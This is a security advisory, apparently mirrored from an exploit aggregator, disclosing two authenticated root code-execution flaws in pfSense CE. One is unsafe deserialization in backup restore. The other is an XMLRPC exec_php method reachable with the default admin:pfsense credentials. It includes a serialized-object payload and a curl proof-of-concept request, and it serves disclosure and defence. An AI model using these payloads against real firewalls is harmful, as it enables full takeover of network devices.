Share
## https://sploitus.com/exploit?id=PACKETSTORM:215645
# ๐ CVE-2025-69690 & CVE-2025-69691
> **Authenticated Remote Code Execution in Netgate pfSense Community Edition**





---
## ๐ Summary
| Field | Details |
|-------|---------|
| **Researcher** | Nelson Adhepeau ([@privlabs](https://github.com/privlabs)) |
| **Vendor** | Netgate |
| **Product** | pfSense Community Edition |
| **Versions** | 2.7.2 and 2.8.0 |
| **Type** | Authenticated Remote Code Execution |
| **Disclosure** | February 2026 |
| **Vendor notified** | December 2, 2025 |
| **CVE assigned** | January 28, 2026 |
---
## โ ๏ธ Disclaimer
> This research was conducted in **isolated lab environments** for educational
> and security awareness purposes only. All findings were responsibly disclosed
> to the vendor prior to publication. This advisory does **not** constitute an
> invitation to attack production systems. Unauthorized testing is illegal.
---
## ๐ฏ CVE-2025-69690
### Unsafe Deserialization โ RCE (pfSense CE 2.7.2)
| Field | Value |
|-------|-------|
| **CVSS v3.1** | **8.8 (High)** |
| **Vector** | `AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H` |
| **CWE** | CWE-502, CWE-915 |
| **Attack Type** | Authenticated (Admin) |
| **Component** | Backup/Restore mechanism |
### Description
The pfSense configuration restore mechanism invokes `unserialize()` on
user-controlled data **without class whitelisting, input validation, or
sandboxing**.
A crafted backup file containing a malicious serialized PHP object injects
arbitrary commands via the `post_reboot_commands` property, which are
executed through `mwexec()` with **full root privileges**.
### Attack Flow
```
[Attacker] โ Login as admin
โ Upload malicious .xml backup file
โ Trigger restore
โ pfSense calls unserialize() on attacker data
โ post_reboot_commands executed via mwexec()
โ [ROOT SHELL]
```
### Affected Components
- `config.php` โ restore processing logic
- `pfsense_module_installer` class โ unsafe deserialization target
- `mwexec()` โ command execution sink
### PoC Payload
```php
O:23:"pfsense_module_installer":1:{
s:17:"*post_reboot_commands";
a:1:{
i:0;s:40:"/usr/local/bin/php -r 'system(\"id\");'";
}
}
```
### Impact
- โ
Arbitrary OS command execution as root
- โ
Persistent backdoor installation
- โ
Complete firewall takeover
- โ
Credential and configuration exfiltration
### Vendor Response
> *"Acknowledged. Classified as authenticated administrative abuse.
> No patch will be issued."* โ Netgate
---
## ๐ฏ CVE-2025-69691
### XMLRPC exec_php โ RCE (pfSense CE 2.8.0)
| Field | Value |
|-------|-------|
| **CVSS v3.1** | **9.9 (Critical)** |
| **Vector** | `AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H` |
| **CWE** | CWE-284, CWE-915 |
| **Attack Type** | Authenticated (remote, Basic Auth) |
| **Component** | XMLRPC API โ `pfsense.exec_php` |
### Description
pfSense CE 2.8.0 exposes an XMLRPC method `pfsense.exec_php` that
**executes arbitrary PHP code as root** without validation, sandboxing,
or any form of restriction.
The endpoint is:
- โ
Enabled **by default**
- โ
Accessible remotely over **HTTPS**
- โ
Protected only by **Basic Authentication**
- โ
Exploitable with **default credentials** (`admin:pfsense`)
### Attack Flow
```
[Attacker] โ Send XMLRPC request to /xmlrpc.php
โ Authenticate with admin:pfsense (default)
โ Call pfsense.exec_php with arbitrary PHP
โ Code executes as root, no sandboxing
โ [ROOT SHELL]
```
### Affected Components
- `xmlrpc.php` โ API entry point
- `pfsense.exec_php` โ unsafe dynamic code execution
- BasicAuth layer โ insufficient access control
### PoC
```bash
curl -k -u admin:pfsense \
-H "Content-Type: text/xml" \
-d '<methodCall>
<methodName>pfsense.exec_php</methodName>
<params>
<param>
<value><string>system("id");</string></value>
</param>
</params>
</methodCall>' \
https://<target>/xmlrpc.php
```
### Impact
- โ
Full remote root compromise
- โ
Arbitrary file read/write
- โ
Backdoor deployment
- โ
Firewall rule manipulation
- โ
Extraction of all credentials and configurations
### Vendor Response
> *"Acknowledged. Classified as expected behavior for authenticated
> users. No patch planned."* โ Netgate
---
## ๐
Timeline
```
November 2025 โ Vulnerabilities discovered
December 2, 2025 โ Responsible disclosure to Netgate
โ Vendor acknowledged, no patch planned
January 28, 2026 โ CVE IDs assigned by MITRE
February 2026 โ Public disclosure
```
---
## ๐ References
- ๐ด [CVE-2025-69690 on cve.org](https://cve.org/CVERecord?id=CVE-2025-69690)
- ๐ด [CVE-2025-69691 on cve.org](https://cve.org/CVERecord?id=CVE-2025-69691)
- ๐ง Full disclosure: `fulldisclosure@seclists.org`
---
## ๐ค Researcher
**Nelson Adhepeau** โ Independent Security Researcher
[](https://linkedin.com/in/nelson-adhepeau)
[](https://github.com/privlabs)
๐ง privexploits@protonmail.com